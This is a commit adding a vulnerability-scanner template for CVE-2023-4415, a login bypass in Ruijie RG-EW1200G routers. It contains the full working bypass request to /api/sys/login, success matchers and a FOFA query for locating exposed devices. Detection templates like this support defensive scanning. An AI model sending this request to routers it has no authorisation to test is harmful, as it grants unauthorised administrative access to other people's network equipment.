Create CVE-2023-4415.yaml
parent
56d79688e0
commit
ed35dd5a96
|
@ -0,0 +1,46 @@
|
|||
id: CVE-2023-4415
|
||||
|
||||
info:
|
||||
name: Ruijie RG-EW1200G Router Background - Login Bypass
|
||||
author: DhiyaneshDK
|
||||
severity: critical
|
||||
description: |
|
||||
A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-4415
|
||||
- https://github.com/blakespire/repoforcve/tree/main/RG-EW1200G-logic
|
||||
metadata:
|
||||
max-request: 1
|
||||
fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"
|
||||
vendor: ruijienetworks
|
||||
product: rg-ew1200g_firmware
|
||||
tags: cve,cve2023,ruijie,router
|
||||
|
||||
http:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/api/sys/login"
|
||||
body: |
|
||||
{
|
||||
"username":"2",
|
||||
"password":"admin",
|
||||
"timestamp":1695218596000
|
||||
}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"result":"ok"'
|
||||
- '"msg":"登入成功"'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- application/json
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue